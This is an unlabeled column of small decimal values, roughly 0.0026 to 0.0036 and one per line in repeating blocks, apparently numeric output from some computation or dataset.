0.00302574
0.00302574
0.00302575
0.00303659
0.00303658
0.00303658
0.00302574
0.00302574
0.00302574
0.00302575
0.00303659
0.00301493
0.00300416
0.00300416
0.00301493
0.00301493
0.00301494
0.00300417
0.00301493
0.00300416
0.00300416
0.00301493
0.00301493
0.00301494
0.00300417
0.00301493
0.00300416
0.00300416
0.00301493
0.00301493
0.00301494
0.00300417
0.00301493
0.00300416
0.00300416
0.00301493
0.00301493
0.00301494
0.00300417
0.00302798
0.00302812
0.00302321
0.00302339
0.00302813
0.00302799
0.00302338
0.00303419
0.00303883
0.00303898
0.00303397
0.00303884
0.00303403
0.00303403
0.00303421
0.00303401
0.00303897
0.00303883
0.00303883
0.00303403
0.00303422
0.00302799
0.0030232
0.0030281
0.0030232
0.00302799
0.00302813
0.00302336
0.00302798
0.00302812
0.00302339
0.00302321
0.00302799
0.00302813
0.00302339
0.00303419
0.00303883
0.00303898
0.00303397
0.00303884
0.00303403
0.00303403
0.00303421
0.00303401
0.00303883
0.00303897
0.00303883
0.00303422
0.00303403
0.00302799
0.0030232
0.0030281
0.0030232
0.00302799
0.00302813
0.00302336
0.00302806
0.00302776
0.00302337
0.00302337
0.00302795
0.00302795
0.00302327
0.00299341
0.00299341
0.00298269
0.00298269
0.00298269
0.0029827
0.00299342
0.00299341
0.00299341
0.00298269
0.00298269
0.00298269
0.0029827
0.00299342
0.00299341
0.00299341
0.00298269
0.00298269
0.00298269
0.0029827
0.00299342
0.002972
0.00296134
0.00296134
0.002972
0.002972
0.00297201
0.00296135
0.002972
0.00296134
0.00296134
0.002972
0.002972
0.00297201
0.00296135
0.002972
0.00296134
0.00296134
0.002972
0.002972
0.00297201
0.00296135
0.002972
0.00296134
0.00296134
0.002972
0.002972
0.00297201
0.00296135
0.00298491
0.00298505
0.00298021
0.00298038
0.00298506
0.00298492
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.00299564
0.0029909
0.0029909
0.00299108
0.0029909
0.00299579
0.00299564
0.00299564
0.00299092
0.00299109
0.00298492
0.0029802
0.00298502
0.00298019
0.00298492
0.00298505
0.00298035
0.00298491
0.00298505
0.00298038
0.00298021
0.00298492
0.00298506
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.00299565
0.0029909
0.00299091
0.00299108
0.0029909
0.00299564
0.00299579
0.00299564
0.00299109
0.00299092
0.00298492
0.0029802
0.00298502
0.00298019
0.00298493
0.00298505
0.00298035
0.00298498
0.00298469
0.00298037
0.00298037
0.00298487
0.00298487
0.00298028
0.00295071
0.00295071
0.0029401
0.0029401
0.0029401
0.00294011
0.00295071
0.00295071
0.00295071
0.0029401
0.0029401
0.0029401
0.00294011
0.00295071
0.00295071
0.00295071
0.0029401
0.0029401
0.0029401
0.00294011
0.00295071
0.00292952
0.00291896
0.00291896
0.00292952
0.00292952
0.00292952
0.00291897
0.00292952
0.00291896
0.00291896
0.00292952
0.00292952
0.00292952
0.00291897
0.00292952
0.00291896
0.00291896
0.00292952
0.00292952
0.00292952
0.00291897
0.00292952
0.00291896
0.00291896
0.00292952
0.00292952
0.00292952
0.00291897
0.0029423
0.00294245
0.00293767
0.00293782
0.00294245
0.0029423
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00295292
0.00294823
0.00294824
0.00294841
0.00294825
0.00295306
0.00295292
0.00295291
0.00294826
0.00294842
0.0029423
0.00293764
0.0029424
0.00293763
0.00294231
0.00294243
0.00293779
0.0029423
0.00294245
0.00293782
0.00293767
0.0029423
0.00294245
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00295292
0.00294823
0.00294824
0.00294841
0.00294825
0.00295292
0.00295306
0.00295291
0.00294842
0.00294826
0.00294231
0.00293764
0.0029424
0.00293763
0.00294231
0.00294243
0.00293779
0.00294236
0.00294208
0.00293782
0.00293781
0.00294225
0.00294225
0.00293772
0.00290843
0.00290843
0.00289793
0.00289793
0.00289793
0.00289793
0.00290844
0.00290843
0.00290843
0.00289793
0.00289793
0.00289793
0.00289793
0.00290844
0.00290843
0.00290843
0.00289793
0.00289793
0.00289793
0.00289793
0.00290844
0.00288745
0.002877
0.002877
0.00288745
0.00288745
0.00288746
0.002877
0.00288745
0.002877
0.002877
0.00288745
0.00288745
0.00288746
0.002877
0.00288745
0.002877
0.002877
0.00288745
0.00288745
0.00288745
0.002877
0.00288745
0.002877
0.002877
0.00288745
0.00288745
0.00288746
0.002877
0.00290011
0.00290026
0.00289554
0.00289569
0.00290026
0.00290011
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00291062
0.00290599
0.002906
0.00290617
0.00290603
0.00291077
0.00291062
0.00291062
0.00290603
0.00290618
0.00290011
0.0028955
0.0029002
0.00289549
0.00290012
0.00290023
0.00289565
0.00290011
0.00290026
0.00289569
0.00289554
0.00290011
0.00290026
0.00289568
0.00290615
0.00291063
0.00291074
0.00290591
0.00291062
0.00290599
0.00290599
0.00290617
0.00290603
0.00291062
0.00291077
0.00291062
0.00290618
0.00290603
0.00290011
0.0028955
0.0029002
0.00289549
0.00290012
0.00290023
0.00289565
0.00290016
0.00289989
0.00289568
0.00289567
0.00290005
0.00290005
0.00289559
0.00286657
0.00286657
0.00285615
0.00285616
0.00285616
0.00285616
0.00286657
0.00286657
0.00286657
0.00285615
0.00285616
0.00285616
0.00285616
0.00286657
0.00286657
0.00286657
0.00285615
0.00285616
0.00285616
0.00285616
0.00286657
0.00284577
0.00283541
0.00283541
0.00284577
0.00284577
0.00284578
0.00283542
0.00284577
0.00283541
0.00283541
0.00284577
0.00284577
0.00284578
0.00283542
0.00284577
0.00283541
0.00283541
0.00284577
0.00284577
0.00284578
0.00283542
0.00284577
0.00283541
0.00283541
0.00284577
0.00284577
0.00284578
0.00283542
0.00285832
0.00285848
0.0028538
0.00285395
0.00285847
0.00285832
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286873
0.00286415
0.00286416
0.00286433
0.0028642
0.00286888
0.00286873
0.00286873
0.0028642
0.00286435
0.00285832
0.00285376
0.0028584
0.00285375
0.00285833
0.00285843
0.00285391
0.00285831
0.00285848
0.00285395
0.0028538
0.00285832
0.00285847
0.00285393
0.00286431
0.00286874
0.00286885
0.00286406
0.00286873
0.00286415
0.00286415
0.00286433
0.0028642
0.00286873
0.00286888
0.00286873
0.00286434
0.0028642
0.00285832
0.00285375
0.0028584
0.00285375
0.00285833
0.00285843
0.00285391
0.00285835
0.0028581
0.00285394
0.00285394
0.00285826
0.00285826
0.00285384
0.00282508
0.00282508
0.00281476
0.00281476
0.00281476
0.00281476
0.00282508
0.00282508
0.00282508
0.00281476
0.00281476
0.00281476
0.00281476
0.00282508
0.00282508
0.00282508
0.00281476
0.00281476
0.00281476
0.00281476
0.00282508
0.00280446
0.00279419
0.00279419
0.00280446
0.00280446
0.00280447
0.00279419
0.00280446
0.00279419
0.00279419
0.00280446
0.00280446
0.00280447
0.00279419
0.00280446
0.00279419
0.00279419
0.00280446
0.00280446
0.00280447
0.00279419
0.00280446
0.00279419
0.00279419
0.00280446
0.00280446
0.00280447
0.00279419
0.0028169
0.00281706
0.00281244
0.00281258
0.00281705
0.00281691
0.00281256
0.00282285
0.00282724
0.00282734
0.00282259
0.00282723
0.00282268
0.0028227
0.00282287
0.00282275
0.00282737
0.00282723
0.00282722
0.00282275
0.00282289
0.00281691
0.00281239
0.00281698
0.00281237
0.00281692
0.00281702
0.00281254
0.0028169
0.00281706
0.00281258
0.00281244
0.00281691
0.00281705
0.00281256
0.00282285
0.00282724
0.00282734
0.00282259
0.00282723
0.00282268
0.00282269
0.00282287
0.00282275
0.00282723
0.00282737
0.00282722
0.00282289
0.00282274
0.00281691
0.00281238
0.00281698
0.00281237
0.00281692
0.00281701
0.00281254
0.00281693
0.00281669
0.00281257
0.00281257
0.00281684
0.00281684
0.00281247
0.00278394
0.00278394
0.00277371
0.00277371
0.00277371
0.00277371
0.00278394
0.00278394
0.00278394
0.0027737
0.00277371
0.00277371
0.00277371
0.00278394
0.00278394
0.00278394
0.00277371
0.00277371
0.00277371
0.00277371
0.00278394
0.0027635
0.00275331
0.00275331
0.0027635
0.0027635
0.0027635
0.00275331
0.00276349
0.00275331
0.00275331
0.0027635
0.0027635
0.0027635
0.00275331
0.00276349
0.00275331
0.00275331
0.0027635
0.0027635
0.0027635
0.00275331
0.00276349
0.00275331
0.00275331
0.0027635
0.0027635
0.0027635
0.00275331
0.00277584
0.002776
0.00277142
0.00277156
0.00277599
0.00277585
0.00277154
0.00278174
0.00278609
0.00278619
0.00278148
0.00278608
0.00278158
0.00278159
0.00278177
0.00278166
0.00278622
0.00278608
0.00278607
0.00278164
0.00278178
0.00277585
0.00277137
0.00277592
0.00277136
0.00277586
0.00277595
0.00277151
0.00277584
0.002776
0.00277156
0.00277142
0.00277585
0.00277599
0.00277154
0.00278174
0.00278609
0.00278619
0.00278148
0.00278608
0.00278158
0.00278159
0.00278177
0.00278166
0.00278608
0.00278622
0.00278607
0.00278178
0.00278164
0.00277585
0.00277137
0.00277592
0.00277136
0.00277586
0.00277595
0.00277151
0.00277586
0.00277562
0.00277155
0.00277155
0.00277577
0.00277577
0.00277144
0.00274314
0.00274314
0.00273298
0.00273298
0.00273298
0.00273299
0.00274314
0.00274314
0.00274314
0.00273298
0.00273299
0.00273299
0.00273299
0.00274314
0.00274314
0.00274314
0.00273298
0.00273299
0.00273299
0.00273299
0.00274314
0.00272285
0.00271274
0.00271274
0.00272285
0.00272285
0.00272285
0.00271274
0.00272285
0.00271274
0.00271274
0.00272285
0.00272285
0.00272285
0.00271274
0.00272285
0.00271274
0.00271274
0.00272285
0.00272285
0.00272285
0.00271274
0.00272285
0.00271274
0.00271274
0.00272285
0.00272285
0.00272285
0.00271274
0.0027351
0.00273527
0.00273073
0.00273087
0.00273525
0.00273511
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274527
0.00274081
0.00274082
0.00274099
0.00274089
0.0027454
0.00274527
0.00274526
0.00274087
0.00274101
0.00273511
0.00273067
0.00273518
0.00273067
0.00273513
0.00273521
0.00273082
0.0027351
0.00273527
0.00273086
0.00273073
0.00273511
0.00273525
0.00273085
0.00274097
0.00274528
0.00274537
0.0027407
0.00274527
0.00274082
0.00274082
0.00274099
0.00274089
0.00274527
0.0027454
0.00274526
0.00274101
0.00274087
0.00273511
0.00273067
0.00273519
0.00273067
0.00273513
0.00273521
0.00273082
0.00273512
0.00273489
0.00273086
0.00273086
0.00273503
0.00273503
0.00273074
0.00270264
0.00270264
0.00269256
0.00269257
0.00269257
0.00269257
0.00270264
0.00270264
0.00270264
0.00269256
0.00269257
0.00269257
0.00269257
0.00270264
0.00270264
0.00270264
0.00269256
0.00269257
0.00269257
0.00269257
0.00270264
0.0026825
0.00267246
0.00267246
0.00268251
0.00268251
0.00268251
0.00267246
0.0026825
0.00267246
0.00267246
0.00268251
0.00268251
0.00268251
0.00267246
0.0026825
0.00267246
0.00267246
0.00268251
0.00268251
0.00268251
0.00267246
0.0026825
0.00267246
0.00267246
0.00268251
0.00268251
0.00268251
0.00267246
0.00269467
0.00269483
0.00269033
0.00269047
0.00269481
0.00269468
0.00269045
0.0027005
0.00270478
0.00270486
0.00270022
0.00270477
0.00270034
0.00270033
0.00270052
0.00270042
0.00270489
0.00270476
0.00270475
0.0027004
0.00270054
0.00269469
0.00269026
0.00269475
0.00269027
0.0026947
0.00269478
0.00269044
0.00269467
0.00269483
0.00269047
0.00269033
0.00269468
0.00269481
0.00269045
0.00270051
0.00270478
0.00270486
0.00270022
0.00270477
0.00270035
0.00270034
0.00270052
0.00270042
0.00270476
0.0027049
0.00270475
0.00270054
0.00270041
0.00269469
0.00269026
0.00269475
0.00269028
0.0026947
0.00269478
0.00269044
0.00269468
0.00269445
0.00269046
0.00269046
0.00269459
0.00269459
0.00269034
0.00266244
0.00266244
0.00265243
0.00265243
0.00265243
0.00265243
0.00266244
0.00266244
0.00266244
0.00265243
0.00265243
0.00265243
0.00265243
0.00266244
0.00266244
0.00266244
0.00265243
0.00265243
0.00265243
0.00265243
0.00266244
0.00265452
0.00265468
0.0026502
0.00265036
0.00265466
0.00265453
0.00265033
0.00266033
0.00266456
0.00266463
0.00266003
0.00266455
0.00266016
0.00266014
0.00266034
0.00266023
0.00266467
0.00266455
0.00266454
0.00266021
0.00266036
0.00265454
0.00265013
0.0026546
0.00265015
0.00265455
0.00265462
0.00265032
0.00265453
0.00265468
0.00265036
0.0026502
0.00265453
0.00265466
0.00265033
0.00266033
0.00266456
0.00266464
0.00266003
0.00266455
0.00266016
0.00266014
0.00266034
0.00266023
0.00266455
0.00266467
0.00266454
0.00266036
0.00266021
0.00265453
0.0026543
0.00265034
0.00265034
0.00265444
0.00265444
0.00265022
0.0036375
0.00363825
0.00363935
0.00363474
0.00363534
0.00363689
0.00363944
0.00363726
0.00363807
0.00363914
0.00363451
0.00363514
0.00363666
0.00363927
0.00362384
0.0036349
0.00362578
0.00362571
0.00362923
0.0036294
0.00362138
0.00362383
0.00363458
0.00362566
0.00362553
0.0036291
0.00362945
0.00362128
0.00362459
0.00362968
0.00363532
0.00362668
0.00363131
0.00362819
0.00362373
0.00362453
0.00362961
0.00363523
0.00362662
0.00363123
0.00362369
0.00362812
0.0036238
0.00362783
0.00362175
0.00361852
0.00362757
0.00362389
0.00361868
0.00362377
0.00362783
0.00362173
0.00361851
0.00362754
0.00362389
0.00361865
0.0035921
0.00358438
0.0035967
0.00358689
0.00359423
0.00359428
0.00358382
0.00359112
0.0035947
0.00358448
0.00358268
0.00359484
0.00359064
0.00358322
0.00359211
0.0035844
0.00359689
0.00358691
0.00359434
0.00359424
0.00358383
0.00359113
0.0035947
0.00358451
0.00358268
0.00359487
0.00359064
0.00358324
0.00363733
0.0036381
0.00363915
0.00363455
0.0036367
0.00363517
0.00363929
0.00362376
0.00363478
0.00362569
0.00362559
0.00362131
0.00362913
0.00362928
0.00362388
0.00363492
0.00362579
0.00362573
0.00362924
0.00362945
0.00362139
0.00363751
0.00363828
0.00363939
0.00363477
0.00363537
0.00363691
0.0036395
0.00362454
0.00362963
0.00363524
0.0036266
0.00363126
0.00362811
0.00362369
0.00362454
0.00362963
0.00363526
0.00362664
0.00363125
0.0036237
0.00362814
0.00362369
0.00362174
0.00362787
0.00361849
0.00362766
0.00361861
0.00362386
0.00359212
0.00358442
0.00359691
0.00358693
0.00359425
0.00359438
0.00358384
0.00359114
0.00359473
0.00358455
0.0035827
0.00359494
0.00359066
0.00358326
0.00362374
0.00362785
0.00362172
0.0036185
0.00362757
0.00362387
0.00361865
0.00359212
0.00358441
0.00359689
0.00358692
0.00359436
0.00359424
0.00358384
0.00359114
0.00359473
0.00358269
0.00358451
0.00359065
0.0035949
0.00358325
0.00362452
0.00362956
0.00363523
0.00362661
0.00363121
0.00362812
0.00362365
0.00359209
0.00358437
0.0035967
0.00358691
0.00358382
0.00359422
0.0035943
0.00359112
0.0035947
0.00358449
0.00358268
0.00358323
0.00359485
0.00359064
0.00362375
0.00362172
0.00362778
0.00361848
0.00362752
0.00361865
0.00362384
0.00359214
0.00358438
0.00359669
0.003587
0.00359443
0.00359423
0.00358384
0.00359113
0.00359471
0.00358269
0.00358451
0.00359065
0.00359486
0.00358323
0.00362368
0.00362775
0.00362167
0.00361846
0.00362744
0.00362382
0.00361859
0.00363736
0.00363817
0.0036392
0.00363459
0.00363674
0.00363524
0.00363936
0.00362386
0.00363488
0.00362573
0.00362564
0.00362135
0.0036292
0.00362938
0.00362382
0.00363487
0.00362573
0.00362563
0.00362919
0.00362934
0.00362134
0.0036374
0.00363818
0.00363924
0.00363461
0.00363524
0.00363677
0.0036394
0.00362461
0.0036297
0.00363535
0.0036267
0.00363134
0.00362822
0.00362375
0.00359211
0.0035844
0.00359689
0.00358692
0.00358384
0.00359424
0.00359436
0.00359114
0.00359473
0.00358269
0.00358451
0.00358325
0.00359066
0.0035949
0.0035921
0.00358437
0.00359669
0.00358692
0.0035943
0.00359421
0.00358383
0.00359114
0.00359473
0.00358269
0.00358451
0.00359066
0.00359486
0.00358324
0.00362382
0.00362175
0.00362784
0.00361854
0.00362756
0.00361869
0.00362392
0.00362377
0.00362175
0.00362784
0.00361854
0.00362757
0.00361869
0.00362391
0.00362389
0.00363481
0.00362574
0.00362565
0.0036292
0.00362135
0.00362953
0.0036239
0.00363498
0.00362582
0.00362576
0.00362928
0.00362141
0.00362947
0.00363736
0.00363819
0.00363925
0.00363462
0.00363674
0.00363523
0.00363943
0.00363753
0.00363832
0.00363941
0.00363479
0.00363693
0.0036354
0.00363952
0.00355265
0.00355423
0.00354922
0.00354923
0.00354861
0.00355353
0.00355353
0.00353629
0.003537
0.0035421
0.00354211
0.00354204
0.00353672
0.00353673
0.00355443
0.00355355
0.00354876
0.00354978
0.00355326
0.00355487
0.00354968
0.00356087
0.00357012
0.00356997
0.00355533
0.00355579
0.00357125
0.0035594
0.00356203
0.0035604
0.00356942
0.0035711
0.00355854
0.0035708
0.00356302
0.00355345
0.00354781
0.00355329
0.00354869
0.0035515
0.00355286
0.00354907
0.00355443
0.00355355
0.00354875
0.00354978
0.00355326
0.00355487
0.00354968
0.00356087
0.00357013
0.00356997
0.00355532
0.00357125
0.00355577
0.0035594
0.00356202
0.0035604
0.00356944
0.0035711
0.0035708
0.00355854
0.00356302
0.00355345
0.00354782
0.00355329
0.00354869
0.0035515
0.00354906
0.00355286
0.00353702
0.00354221
0.00354246
0.00353609
0.00354246
0.00353636
0.00353698
0.00352985
0.00352444
0.00353064
0.00352396
0.00352977
0.00352957
0.0035246
0.00353661
0.00354133
0.00354181
0.00353663
0.00353634
0.00354205
0.00353555
0.00353009
0.00352986
0.00352447
0.00352483
0.00353016
0.00353009
0.00352484
0.00353701
0.0035422
0.00354246
0.00353609
0.00354246
0.00353636
0.00353698
0.00352985
0.00352444
0.00353064
0.00352396
0.00352958
0.00352976
0.0035246
0.00353661
0.00354133
0.00354181
0.00353663
0.00354205
0.00353555
0.00353634
0.00353009
0.00352986
0.00352446
0.00352484
0.00353015
0.00353009
0.00352484
0.00355264
0.00355423
0.00354922
0.00354922
0.00355352
0.00355352
0.00354861
0.00353628
0.003537
0.0035421
0.0035421
0.00353672
0.00354203
0.00353672
0.00355444
0.00355356
0.00354877
0.00354978
0.00355327
0.00355487
0.00354969
0.00356087
0.00357015
0.00356998
0.00355535
0.00355579
0.00357126
0.00355942
0.00356204
0.0035604
0.00356946
0.00357111
0.00355856
0.00357081
0.00356303
0.00355346
0.00354782
0.0035533
0.0035487
0.0035515
0.00355287
0.00354907
0.00355444
0.00355356
0.00354978
0.00354877
0.00355487
0.00355327
0.00354969
0.00356087
0.00357014
0.00356997
0.00355532
0.00357126
0.00355577
0.00355941
0.00356203
0.0035604
0.00357111
0.00356944
0.00357081
0.00356303
0.00355854
0.00355345
0.00354783
0.0035533
0.0035487
0.0035515
0.00354907
0.00355287
0.00353702
0.00354221
0.00354247
0.00353609
0.00354247
0.00353636
0.00353698
0.00352985
0.00352444
0.00353064
0.00352395
0.00352977
0.00352957
0.0035246
0.00353661
0.00354134
0.00354181
0.00353664
0.00353634
0.00354206
0.00353555
0.00353009
0.00352986
0.00352446
0.00352483
0.00353016
0.00353009
0.00352484
0.00353702
0.00354247
0.00354221
0.00353609
0.00354247
0.00353698
0.00353636
0.00352985
0.00352444
0.00353064
0.00352396
0.00352957
0.00352977
0.0035246
0.00353661
0.00354133
0.00354181
0.00353663
0.00354205
0.00353554
0.00353634
0.00353009
0.00352986
0.00352483
0.00352446
0.00353009
0.00353015
0.00352484
0.00355444
0.00355357
0.00354978
0.00354876
0.00355487
0.00355328
0.00354969
0.00356089
0.00357014
0.00357006
0.00355536
0.00355942
0.00357128
0.00355584
0.00356204
0.00356042
0.00357111
0.00356947
0.00356303
0.00357081
0.00355857
0.00355346
0.00354784
0.00355331
0.00354869
0.00355287
0.00355153
0.00354908
0.00353701
0.0035422
0.00354247
0.00353609
0.00354246
0.00353635
0.00353698
0.00352985
0.00352444
0.00353063
0.00352396
0.0035246
0.00352976
0.00352957
0.00353661
0.00354132
0.0035418
0.00353662
0.00354205
0.00353633
0.00353554
0.00353009
0.00352986
0.00352446
0.00352483
0.00352484
0.00353015
0.00353009
0.00353701
0.00354247
0.0035422
0.00353609
0.00354246
0.00353698
0.00353636
0.00352985
0.00352444
0.00353065
0.00352396
0.00352958
0.00352977
0.0035246
0.00353661
0.00354134
0.00354181
0.00353664
0.00354205
0.00353555
0.00353634
0.00353009
0.00352986
0.00352484
0.00352447
0.00353009
0.00353016
0.00352484
0.00355265
0.00355423
0.00354922
0.00354922
0.00355353
0.00355352
0.0035486
0.00353629
0.003537
0.0035421
0.0035421
0.00353672
0.00354204
0.00353672
0.00355443
0.00355354
0.00354978
0.00354875
0.00355486
0.00355326
0.00354968
0.00356087
0.00357013
0.00356997
0.00355532
0.0035594
0.00357125
0.00355577
0.00356202
0.00356039
0.0035711
0.00356945
0.00356302
0.0035708
0.00355854
0.00355345
0.00354781
0.00355328
0.00354869
0.00355285
0.00355149
0.00354907
0.00353701
0.00354246
0.0035422
0.00353608
0.00354246
0.00353697
0.00353635
0.00352984
0.00352444
0.00353064
0.00352395
0.0035246
0.00352976
0.00352957
0.0035366
0.00354133
0.0035418
0.00353663
0.00354205
0.00353634
0.00353554
0.00353008
0.00352985
0.00352483
0.00352446
0.00352483
0.00353008
0.00353015
0.00353701
0.00354246
0.0035422
0.00353608
0.00354246
0.00353697
0.00353635
0.00352984
0.00352444
0.00353064
0.00352395
0.00352957
0.00352976
0.0035246
0.0035366
0.00354132
0.0035418
0.00353663
0.00354205
0.00353554
0.00353634
0.00353008
0.00352985
0.00352483
0.00352446
0.00353008
0.00353015
0.00352483
0.00353629
0.00353701
0.0035421
0.0035421
0.00354204
0.00353672
0.00353673
0.00350518
0.0035044
0.00349934
0.00349935
0.00349922
0.00350487
0.00350487
0.00348632
0.0034867
0.00349206
0.00349206
0.00349236
0.00348646
0.00348646
0.00350507
0.00350512
0.00349926
0.00349959
0.00350529
0.00350506
0.00349958
0.00351212
0.00351757
0.00351748
0.00351235
0.00351155
0.00351758
0.00351198
0.0035123
0.00351177
0.00351791
0.0035177
0.00351196
0.00351772
0.0035123
0.00350497
0.00349892
0.00350569
0.0034993
0.00350495
0.00350497
0.00349943
0.00350507
0.00350512
0.00349926
0.00349959
0.00350529
0.00350506
0.00349958
0.00351212
0.00351757
0.00351749
0.00351235
0.00351758
0.00351155
0.00351198
0.0035123
0.00351177
0.0035179
0.0035177
0.00351772
0.00351196
0.0035123
0.00350497
0.00349892
0.00350569
0.0034993
0.00350495
0.00349943
0.00350497
0.00348671
0.00349248
0.00349226
0.00348627
0.00349226
0.00348637
0.00348672
0.00347923
0.00347345
0.00347981
0.00347313
0.00347924
0.00347928
0.00347358
0.00348656
0.00349219
0.00349218
0.00348664
0.00348643
0.00349217
0.00348608
0.00347932
0.00347944
0.00347338
0.00347374
0.00347953
0.00347932
0.00347373
0.0034867
0.00349248
0.00349226
0.00348627
0.00349226
0.00348637
0.00348672
0.00347923
0.00347345
0.00347981
0.00347313
0.00347928
0.00347924
0.00347358
0.00348656
0.00349219
0.00349218
0.00348664
0.00349217
0.00348608
0.00348643
0.00347932
0.00347944
0.00347338
0.00347374
0.00347953
0.00347932
0.00347373
0.00350518
0.0035044
0.00349934
0.00349934
0.00350487
0.00350487
0.00349922
0.00348632
0.00348671
0.00349206
0.00349206
0.00348646
0.00349236
0.00348647
0.00350507
0.00350512
0.00349926
0.00349958
0.00350529
0.00350506
0.00349958
0.00351212
0.00351757
0.00351748
0.00351235
0.00351155
0.00351758
0.00351198
0.0035123
0.00351177
0.0035179
0.0035177
0.00351196
0.00351772
0.0035123
0.00350497
0.00349892
0.00350569
0.0034993
0.00350495
0.00350497
0.00349943
0.00350507
0.00350512
0.00349959
0.00349926
0.00350506
0.00350529
0.00349958
0.00351212
0.00351757
0.00351748
0.00351234
0.00351758
0.00351155
0.00351198
0.0035123
0.00351177
0.0035177
0.0035179
0.00351772
0.0035123
0.00351196
0.00350497
0.00349892
0.00350569
0.0034993
0.00350494
0.00349943
0.00350497
0.0034867
0.00349248
0.00349226
0.00348627
0.00349226
0.00348637
0.00348672
0.00347923
0.00347344
0.00347981
0.00347313
0.00347924
0.00347929
0.00347358
0.00348656
0.0034922
0.00349218
0.00348664
0.00348643
0.00349217
0.00348608
0.00347932
0.00347944
0.00347338
0.00347374
0.00347953
0.00347932
0.00347373
0.00348671
0.00349226
0.00349248
0.00348627
0.00349226
0.00348672
0.00348637
0.00347923
0.00347345
0.00347981
0.00347313
0.00347928
0.00347924
0.00347358
0.00348656
0.00349219
0.00349218
0.00348664
0.00349217
0.00348608
0.00348643
0.00347932
0.00347944
0.00347374
0.00347338
0.00347932
0.00347953
0.00347373
0.00350507
0.00350512
0.00349959
0.00349926
0.00350506
0.00350529
0.00349958
0.00351212
0.00351757
0.00351749
0.00351235
0.00351198
0.00351758
0.00351155
0.0035123
0.00351177
0.0035177
0.0035179
0.0035123
0.00351772
0.00351196
0.00350497
0.00349892
0.00350569
0.0034993
0.00350497
0.00350495
0.00349943
0.0034867
0.00349248
0.00349226
0.00348627
0.00349226
0.00348637
0.00348672
0.00347923
0.00347344
0.00347981
0.00347313
0.00347358
0.00347924
0.00347929
0.00348656
0.0034922
0.00349218
0.00348664
0.00349217
0.00348643
0.00348608
0.00347932
0.00347944
0.00347338
0.00347374
0.00347373
0.00347953
0.00347932
0.00348671
0.00349226
0.00349248
0.00348627
0.00349226
0.00348672
0.00348637
0.00347923
0.00347345
0.00347981
0.00347313
0.00347928
0.00347924
0.00347358
0.00348656
0.0034922
0.00349218
0.00348664
0.00349217
0.00348608
0.00348643
0.00347932
0.00347944
0.00347374
0.00347338
0.00347932
0.00347953
0.00347373
0.00350518
0.0035044
0.00349934
0.00349934
0.00350487
0.00350487
0.00349921
0.00348632
0.00348671
0.00349206
0.00349206
0.00348646
0.00349236
0.00348647
0.00350507
0.00350512
0.00349958
0.00349926
0.00350506
0.00350529
0.00349958
0.00351212
0.00351757
0.00351748
0.00351235
0.00351198
0.00351758
0.00351155
0.0035123
0.00351177
0.0035177
0.0035179
0.0035123
0.00351771
0.00351196
0.00350497
0.00349892
0.00350569
0.0034993
0.00350497
0.00350495
0.00349943
0.0034867
0.00349226
0.00349248
0.00348627
0.00349226
0.00348671
0.00348637
0.00347923
0.00347345
0.00347981
0.00347313
0.00347358
0.00347924
0.00347928
0.00348656
0.00349219
0.00349218
0.00348664
0.00349217
0.00348643
0.00348608
0.00347932
0.00347944
0.00347374
0.00347338
0.00347372
0.00347932
0.00347953
0.00348671
0.00349226
0.00349248
0.00348627
0.00349226
0.00348672
0.00348637
0.00347923
0.00347345
0.00347981
0.00347313
0.00347928
0.00347924
0.00347358
0.00348656
0.00349219
0.00349218
0.00348664
0.00349217
0.00348608
0.00348643
0.00347932
0.00347944
0.00347374
0.00347338
0.00347932
0.00347953
0.00347373
0.00348632
0.00348671
0.00349206
0.00349207
0.00349236
0.00348646
0.00348647
0.00345328
0.00345271
0.00344739
0.00344739
0.00344719
0.00345306
0.00345306
0.00343414
0.0034347
0.00344001
0.00344001
0.00344021
0.00343435
0.00343435
0.00345326
0.0034534
0.00344727
0.00344766
0.00345344
0.00345327
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346012
0.00346622
0.00346041
0.00346069
0.00346029
0.0034665
0.00346631
0.00346034
0.0034663
0.00346071
0.00345317
0.00344709
0.00345362
0.00344735
0.00345326
0.00345316
0.0034475
0.00345326
0.00345339
0.00344727
0.00344766
0.00345344
0.00345327
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346622
0.00346012
0.00346041
0.00346069
0.00346029
0.0034665
0.00346631
0.0034663
0.00346034
0.00346071
0.00345317
0.00344708
0.00345362
0.00344735
0.00345326
0.0034475
0.00345316
0.0034346
0.00344037
0.00344023
0.00343421
0.00344021
0.00343422
0.00343463
0.0034271
0.0034213
0.00342746
0.00342108
0.00342709
0.00342721
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00343431
0.00344012
0.00343407
0.00342718
0.00342732
0.00342121
0.00342162
0.00342734
0.00342721
0.00342159
0.0034346
0.00344038
0.00344023
0.0034342
0.00344021
0.00343423
0.00343463
0.0034271
0.0034213
0.00342746
0.00342108
0.00342721
0.00342709
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00344012
0.00343406
0.00343431
0.00342718
0.00342732
0.00342121
0.00342162
0.00342734
0.00342721
0.00342159
0.00345328
0.00345271
0.00344739
0.00344739
0.00345306
0.00345306
0.00344719
0.00343414
0.0034347
0.00344001
0.00344001
0.00343435
0.00344021
0.00343435
0.00345326
0.0034534
0.00344727
0.00344766
0.00345344
0.00345327
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346012
0.00346622
0.00346041
0.00346069
0.00346029
0.0034665
0.00346632
0.00346034
0.0034663
0.00346071
0.00345317
0.00344709
0.00345362
0.00344735
0.00345326
0.00345316
0.0034475
0.00345326
0.0034534
0.00344766
0.00344728
0.00345327
0.00345344
0.00344764
0.00346055
0.00346622
0.00346629
0.00346051
0.00346622
0.00346012
0.00346041
0.00346069
0.00346029
0.00346631
0.0034665
0.0034663
0.00346071
0.00346034
0.00345317
0.00344708
0.00345362
0.00344735
0.00345326
0.0034475
0.00345316
0.0034346
0.00344037
0.00344023
0.00343421
0.00344021
0.00343422
0.00343463
0.0034271
0.0034213
0.00342746
0.00342108
0.00342709
0.00342721
0.00342145
0.00343446
0.00344022
0.00344011
0.00343433
0.00343431
0.00344012
0.00343407
0.00342718
0.00342732
0.00342121
0.00342162
0.00342734
0.00342721
0.00342159
0.0034346
0.00344023
